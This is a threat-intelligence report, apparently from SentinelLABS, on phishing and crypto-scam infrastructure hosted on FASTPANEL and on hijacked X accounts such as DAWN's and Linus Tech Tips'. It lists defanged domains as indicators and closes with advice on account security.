FASTPANEL is a website hosting and building service that specializes in rapid building and management of websites. While FASTPANEL is not a malicious service, it is frequently abused by bad actors due to its ease of use, rapid scalability, and relatively low cost. FASTPANEL is routinely utilized by drainer gangs and phishing campaigns, and is also included in associated guides and tutorials distributed throughout cybercrime communication channels.
Example discussion of FASTPANEL (RU crime forum)
Of the sites hosted on 84.38.130[.]20, the buy-tanai[.]com and emotionai[.]live sites still present the FASTPANEL landing pages as of this writing.
Publicly Linkable Activity
Emerging Account Intrusions
While we have not yet established a high-confidence link, a recent compromise of a Tor Project account closely mirrors our observations. On January 30, 2025, the official X account for the Tor Project was breached. While it is possible that the same threat actor is responsible, we lack sufficient evidence to confirm the connection as of this writing.
X post from The Tor Project account on January 30, 2025 advising users of a potential compromise
The Decentralized Autonomous Wireless Network (DAWN) was another victim of this type of attack. The threat actor leveraged the compromised DAWN-related social media accounts to lure victims to phishing pages that harvested X and Telegram credentials.
DAWN X Posts
The compromise of DAWN’s X accounts goes back to mid-January 2025.
January 14, 2025 – DAWN rewards compromise post
Crypto-Themed Project Placeholders
In some cases, we’ve observed cryptocurrency themed projects seemingly acting as placeholders for future use, or direct pump-and-dump schemes. In one example, buy-tanai[.]com was pitched as such: “$TANA AI. Dawn’s AI project, Tana is the first AI-powered LP and trading agent, now live on the Solana blockchain.”
Tana AI (TANA) on Pump[.]fun
The domain buy-tanai[.]com currently displays default FASTPANEL landing pages, suggesting it — along with other similar domains — is being staged for future attacks. Since FASTPANEL-managed sites can be rapidly updated, these domains serve as adaptable templates for phishing campaigns.
Notably, TANA AI (TANA) was launched by Dawn in mid-January to promote AI-driven trading and liquidity provision in the cryptocurrency market. Despite losing most of its initial value within days, the currency remains actively traded across multiple decentralized exchanges.
Given the crypto-related nature of these domains, it is likely that threat actors are using them as flexible phishing infrastructure. By keeping them as blank templates, they can quickly modify hosted content to align with ongoing campaigns as needed.
Crimeware Relations
Several other domains share overlaps in both use and unique infrastructure details, yet they represent a fork from the previously described high-profile social media profile attacks, including:
dataoptimix[.]com
gamecodestudios[.]com
shortwayscooter[.]com
The domain shortwayscooter[.]com hosts fake captchas that deliver the DanaBot banking trojan. DataOptimix is branded as a generative AI solution, though there are few details about what the service does.
DataOptimix
Historical Connections
In mid-2024, a campaign used related infrastructure in similar phishing messages, including those which compromised the Linus Tech Tips Twitter account along with several other high-profile users. At the time, @LinusTech had roughly 1.8 million followers, which may represent the highest-profile account successfully hijacked and linked to this actor.
Linus Tech Tips Twitter compromise
Conclusion
The cryptocurrency landscape offers financially-motivated threat actors multiple opportunities for profit and fraud. While marketing for coins and tokens has long been irreverent and meme-driven, recent developments have further blurred the line between legitimate projects and scams.
A striking example occurred in January 2025, when the X account of the late crypto-enthusiast and antivirus founder John McAfee was reactivated to promote a new coin, $AIntivirus. The marketing style and brand voice of this purportedly legitimate token closely resemble tactics used in known scam campaigns, highlighting how easily crypto enthusiasts can be misled in an already murky ecosystem.
To safeguard your X account, we strongly recommend using a unique password, enabling two-factor authentication (2FA), and avoiding credential sharing with third-party services. Be especially cautious of messages containing links to account alerts or security notices. Always verify URLs before clicking, and if a password reset is needed, initiate it directly through the official website or app rather than relying on unsolicited links.
If you’ve encountered similar suspicious activity, we’d love to hear from you. Contact SentinelLABS at ThreatTips@sentinelone.com.